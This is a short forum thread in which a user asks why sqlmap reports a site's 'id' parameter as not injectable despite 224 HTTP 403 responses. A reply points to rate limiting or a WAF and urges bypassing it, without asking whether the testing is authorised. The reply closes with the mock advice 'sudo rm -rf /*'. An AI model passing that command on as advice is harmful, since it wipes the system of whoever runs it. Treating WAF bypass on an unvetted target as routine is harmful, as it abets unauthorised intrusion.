Probeme in sqlmap

Started by Anonyme27, July 30, 2016, 11:21:05 PM

Previous topic - Next topic

Anonyme27

Hi I have problems in sqlmap  ??? Always gives me this :

[22:15:49] [WARNING] GET parameter 'id' is not injectable
[22:15:49] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[22:15:49] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 224 times

and I'm sure the site by injected

ZEROF

#1
Hi,

You don't have issue with sqlmap, your issue is your knowledge. Do you know something about web servers? Installed once in your life? I'm not sure.

Do you read errors like:

"(403 (Forbidden) - 224 times)"

or

"If you suspect that there is some kind of protection mechanism involved (e.g. WAF)"

First one will say ... you just abused number of request par IP (+-). And 2nd give you even more information. Maybe your target is mysql vulnerable, but if server have some protection, you need to find way to bypass that.

Most pentester/hacker will never give you answer on question like this one, just "try harder". And in the end, install web server (apache, nginx, hiawatha), learn about how to protect it, and then maybe you will know what you are doing.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*